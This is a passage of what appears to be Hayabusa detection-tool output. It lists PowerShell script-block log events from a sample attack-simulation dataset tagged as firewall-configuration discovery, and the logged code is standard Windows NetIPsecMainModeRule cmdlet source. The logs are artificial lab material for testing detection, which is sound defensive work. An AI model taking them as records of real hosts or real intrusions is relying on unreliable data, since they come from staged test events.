[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 